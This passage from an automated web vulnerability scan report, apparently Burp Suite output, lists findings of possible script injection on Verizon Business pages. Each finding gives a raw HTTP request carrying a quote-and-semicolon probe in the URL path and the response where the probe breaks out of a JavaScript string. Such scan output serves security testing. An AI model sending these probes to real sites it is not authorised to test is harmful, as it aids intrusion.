Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions45e9d'%3b1989311e036/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:36:59 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41884
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions45e9d';1989311e036/contact-center/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.934. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/contact-center/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f868"%3b1ad0efe4e7f was submitted in the REST URL parameter 2. This input was echoed as 1f868";1ad0efe4e7f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions1f868"%3b1ad0efe4e7f/contact-center/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:33 GMT
Content-Type: text/html
Content-Length: 41886
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:33 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:33 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions1f868";1ad0efe4e7f/contact-center/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.935. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/contact-center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b8c58'%3b3bcb7af0e14 was submitted in the REST URL parameter 3. This input was echoed as b8c58';3bcb7af0e14 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/contact-centerb8c58'%3b3bcb7af0e14/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:39 GMT
Content-Type: text/html
Content-Length: 43110
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:39 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/contact-centerb8c58';3bcb7af0e14/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.936. http://www.verizonbusiness.com/solutions/bysolutions/contact-center/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/contact-center/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9211e"%3bd0259aad6f9 was submitted in the REST URL parameter 3. This input was echoed as 9211e";d0259aad6f9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/contact-center9211e"%3bd0259aad6f9/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:37:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43108
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:37:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:37:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/contact-center9211e";d0259aad6f9/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.937. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/continuity/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f27de"%3b516b3016ace was submitted in the REST URL parameter 1. This input was echoed as f27de";516b3016ace in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsf27de"%3b516b3016ace/bysolutions/continuity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:34:24 GMT
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:34:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:34:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsf27de";516b3016ace/bysolutions/continuity/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM
...[SNIP]...

1.938. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/continuity/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c94b'%3bd774a2fe2d6 was submitted in the REST URL parameter 1. This input was echoed as 6c94b';d774a2fe2d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions6c94b'%3bd774a2fe2d6/bysolutions/continuity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40666
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions6c94b';d774a2fe2d6/bysolutions/continuity/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.939. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/continuity/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8804f"%3b7ffa565d19a was submitted in the REST URL parameter 2. This input was echoed as 8804f";7ffa565d19a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions8804f"%3b7ffa565d19a/continuity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:38 GMT
Content-Type: text/html
Content-Length: 41878
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:38 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:38 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions8804f";7ffa565d19a/continuity/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.940. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/continuity/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1901'%3b31bdf9dc4e was submitted in the REST URL parameter 2. This input was echoed as d1901';31bdf9dc4e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsd1901'%3b31bdf9dc4e/continuity/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:07 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 41874
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:07 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:07 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsd1901';31bdf9dc4e/continuity/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.941. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/continuity/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ae3e5'%3b8130fc85545 was submitted in the REST URL parameter 3. This input was echoed as ae3e5';8130fc85545 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/continuityae3e5'%3b8130fc85545/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:17 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43100
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:17 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:17 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutions/continuityae3e5';8130fc85545/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.942. http://www.verizonbusiness.com/solutions/bysolutions/continuity/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/continuity/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80792"%3b8511b1fc7ae was submitted in the REST URL parameter 3. This input was echoed as 80792";8511b1fc7ae in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutions/continuity80792"%3b8511b1fc7ae/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 43102
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/bysolutions/continuity80792";8511b1fc7ae/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.943. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/emergency/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6757'%3b4b32638a1df was submitted in the REST URL parameter 1. This input was echoed as f6757';4b32638a1df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsf6757'%3b4b32638a1df/bysolutions/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:25 GMT
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:25 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutionsf6757';4b32638a1df/bysolutions/emergency/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.944. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/emergency/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64112"%3b59255b08c60 was submitted in the REST URL parameter 1. This input was echoed as 64112";59255b08c60 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions64112"%3b59255b08c60/bysolutions/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:35:52 GMT
Content-Type: text/html
Content-Length: 40664
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:35:52 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:35:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions64112";59255b08c60/bysolutions/emergency/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM E
...[SNIP]...

1.945. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/emergency/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5af1'%3b552d7794ebb was submitted in the REST URL parameter 2. This input was echoed as b5af1';552d7794ebb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/bysolutionsb5af1'%3b552d7794ebb/emergency/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:36:41 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41874
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:36:41 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:36:41 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/bysolutionsb5af1';552d7794ebb/emergency/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.946. http://www.verizonbusiness.com/solutions/bysolutions/emergency/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/bysolutions/emergency/

Issue detail

